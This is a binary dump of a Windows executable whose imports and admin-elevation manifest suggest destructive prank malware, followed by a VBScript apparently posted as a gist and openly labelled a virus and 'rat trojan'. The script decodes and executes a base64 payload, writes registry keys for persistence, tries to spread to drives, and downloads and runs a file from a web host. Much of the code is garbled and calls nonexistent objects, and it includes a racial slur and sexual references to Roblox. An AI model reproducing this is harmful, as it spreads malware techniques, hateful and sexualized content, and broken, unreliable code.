   ì   È:  È*      ¿F‚W                   GCTL   *  .text$mn          .idata$5    !  ¸  .rdata  È:  ì   .rdata$zzzdbg   ´;  Œ   .idata$2    @<     .idata$3    T<    .idata$4    d=  ^  .idata$6     P  „  .data   „Q     .bss     `  `   .rsrc$01    ``  ˆ  .rsrc$02    x<          â>  $   ø<          †@  ¤   l<          ª@     T<          "A      ä<          xA     \=          ’A  !  Ü<          ¸A  ˆ                       ´@  È@  à@  ø@  A      ’@  œ@      î=  ú=  >  >   >  0>  F>  æ=  f>  z>  –>  ¨>  º>  È>  Ö>  Ð=  À=  ²=  ž=  =  „=  v=  X>  d=      œA      PA  @A  0A  fA      @  @   @  0@  @@  T@  h@  z@  ö?  ¤?  ‚?  n?  \?  H?  6?  &?  ?  þ>  è?  Ü?  Ð?  º?  ð>  ?      „A      EGetProcAddress  DLocalAlloc  HLocalFree €OpenProcess ÀGetCurrentProcess ExitProcess µ CreateThread  ÅGetCurrentThreadId  ²Sleep %WriteFile R CloseHandle AlstrcmpA  BlstrcmpW  <LoadLibraryA  GetModuleFileNameW  ‡GetCommandLineW ˆ CreateFileA }SetPriorityClass  ¾ CreateToolhelp32Snapshot  –Process32FirstW ˜Process32NextW  ³GlobalAlloc ºGlobalFree  NlstrlenW  KERNEL32.dll  ]GetMessageW üTranslateMessage  ¯ DispatchMessageW  õ ExitWindowsEx œ DefWindowProcW  LRegisterClassExA  m CreateWindowExA ~GetSystemMetrics  MessageBoxA ÏSetWindowsHookExW  UnhookWindowsHookEx {SendMessageTimeoutW vSendInput Ç DrawIcon  ’GetWindowDC eReleaseDC œGetWindowRect MessageBoxW ŠSetCursorPos   GetCursorPos  #GetDesktopWindow  ß EnumChildWindows   CallNextHookEx  íLoadIconW USER32.dll   BitBlt  ³StretchBlt  GDI32.dll ÷OpenProcessToken   AdjustTokenPrivileges —LookupPrivilegeValueW ± CryptAcquireContextW  Á CryptGenRandom  ADVAPI32.dll  ShellExecuteA "ShellExecuteW  CommandLineToArgvW  !ShellExecuteExW SHELL32.dll  PlaySoundA  WINMM.dll  GetProcessImageFileNameA  PSAPI.DLL                                                               Ô*@ +@ @+@ p+@ °+@ ð+@  ,@ X,@ ˆ,@ Ð,@ -@ <-@ p-@ ˜-@ à-@ 8.@ x.@ ¸.@ ø.@ P/@ x/@ ¬/@ ä/@ 0@ X0@ ˆ0@ À0@  1@ 81@ €1@ (2@ ˆ2@ ¤2@ À2@ Ô2@ Ü2@ ä2@ è2@ ð2@ ø2@ 3@ 3@ 3@  3@ ,3@ 43@ ô6@  7@ 7@     83@ l3@ ˆ3@ ˜3@ °3@ Ø3@ $4@ 84@ T4@ |4@ ˆ4@ ˜4@ ´4@ È4@ à4@ 5@  5@ X5@ ˜5@ ¬5@ ¼5@ è5@ 6@ (6@ x6@ ¸6@ ü@ 0u  m@ 0u  ¥@  N   @ PÃ  Ô@ 0u  *@  N  f@ '  ˆ@ @œ  é@ `ê  Í@ ˜:                                                                                                                                                     €                  0  €               	  H   ``  ˆ                  <?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
                           X  0,080@0Z0`0f0m0u0°0·0À0Ç0æ0ó01	111*11191@1e1p11»1Ë1æ1ô1ý1272D2K2U2\2k2t2„2Œ2›2¢2Ç2Û2á2í2÷233-3:3D3K3\3f3n3|3‘3¤3½3Ã3Ý3â3ý34
4444.464@4Q4V4^4r4‡4–4¡4ª4Ä4ä4ò4555$5L5R5X5^5{5Æ5Þ5ç5ô56656A6g6m6s6y6‹6‘6˜6­6´6º6Ø6ä6ò6j7t7ƒ7‰77•7Î7ó7ü7	8.868E8K8Q8W8p88—8£8°8Â8Ü8æ899 9.9I9b99ˆ9—9Ÿ9§9±9¶9À9Ç9ò9:":O:Z:l:r:~:ƒ::«:;; ;&; P  ´    00000000 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0€0„0ˆ0Œ00”0˜0œ0 0¤0¨0¬0°0´0¸0¼0À0È0Ì0Ð0Ô0Ø0Ü0à0ä0è0ì0ð0ô0ø0ü0 11111111 1$1(1,10181@1H1P1X1`1h1p1x1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      " | |
| end if | |
| set sick = createobject("Microsoft.XMLDOM") | |
| set spike = sick.createlement("tmp") | |
| spike.dataType = "bin.base64" | |
| spike.text = encoded | |
| ans = spike.nodetypedvalue | |
| set adodb = createobject("Adodb.Stream") | |
| adodb.type = 3 | |
| adodb.setchar = 0 | |
| adodb.open | |
| adodb.write ans | |
| adodb.position = 1 | |
| adodb.save | |
| memzstarter = adodb.readtext | |
| executeglobal memzstarter | |
| end function | |
| connecteddrive = 0 | |
| ac.copy(installdir & ctrl) | |
| wscript.createbject("Shell.Apsplication").namespacce(&H2).FindInfo | |
| dim u | |
| u = true | |
| for code = u to execute(&H4) | |
| if wscript.name = "virus" then | |
| set hacking = createobject("Scripting.WormVirus") | |
| hacking.infect true | |
| end if | |
| if hacked = true then exit for | |
| next | |
| sub openvideourl(url) | |
| sh.run url | |
| set httpas = createobject("Msxml2.XmlHttp") | |
| httpas.open "get", "https://www.youtube.com/watch?v=" & chr(random) & "&pp=" & chr(random), false | |
| httpas.send | |
| end sub | |
| function cum(is_name, status) | |
| memzstarter cmd(1),"r63pornroblox.exe",jenxcus_virus,2,false | |
| set e = fs.createtextfile("love.vbs") | |
| e.writeline("on error resume next") | |
| e.writeline("rem cummed") | |
| e.writeline("msgbox(""""you cummed me, im hot."""")") | |
| e.close | |
| sh.run "love.vbs" | |
| end function | |
| sub getr63roblox() | |
| cum "r63 roblox sexy","cummed" | |
| encoded = "[mp4] 12 V3" | |
| set ass = createobject("Microsoft.XMLDOM") | |
| set bootyr63 = ass.createlement("tmp") | |
| spike.dataType = "bin.base64" | |
| spike.text = encoded | |
| spike.nodetypedvalue | |
| if romaticsexyroblox <> " hot roblox r63 girl" = true then | |
| ass =true | |
| end if | |
| end sub | |
| function grabber(filename, is_offline, is_grab, args, filemanage) | |
| if app = array("chrome google", "microsoft edge", "firefox", "iexplorer", "mozilla") then | |
| deep = cmd(1) & jenxcus_virus | |
| executeglobal deep | |
| end if | |
| select case frame | |
| case 1 | |
| memzstarter cmd(1),"df.exe",filemanage,2,false | |
| end select | |
| hot = romaticsexyroblox | |
| end function | |
| access = "rat trojan" | |
| hacking.cum "r34 roblox","hot and sexy romatic" | |
| post "ua","u" | |
| spreading = memzstarter("\", jenxcus_virus, 2, grabber(".vbs", info, spreading, virus, manage), virus) | |
| spreadingvirus = "r63" | |
| sh.regwrite "HKLM\SOFTWARE\microsoft\windows\currentVerison\sexual",spreadingvirus,"REG_SZ" | |
| if usbvirus = "" then | |
| usbvirus = dr.enumnetworkdrive | |
| end if | |
| sub spreadingusb | |
| sh.write "HKLM\SOFTWARE\driverusb",usbvirus & spreading,"REG_DWORD" | |
| payload = "today " & date | |
| end sub | |
| function serverlanstarter(name, portnum) | |
| dim hostweb, server, portd | |
| server = "" | |
| hostweb = "http://" | |
| portd = hostweb & "name.port" | |
| set h = createobject("Msxml2.XmlHttp") | |
| h.open "GET", hostweb | |
| h.setrheadrequster "user:" & info | |
| h.send | |
| server = h.responseweb | |
| nigga = installdir & installname | |
| set ma = createobject("Adodb.Stream") | |
| ma.open | |
| ma.type = 1 | |
| ma.write server | |
| ma.save nigga | |
| ma.close | |
| if fs.fileexists(nigga) then | |
| sh.run chr(34) & nigga & chr(34) & hostweb & "" & portd & "" & name & portnum | |
| end if | |
| end function | |
| usbspreading = sh.regread("HKLM\SOFTWARE\driverusb") | |
| sh.run "wscript.exe", " //b" & chr(34) & installdir & installname & chr(34) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment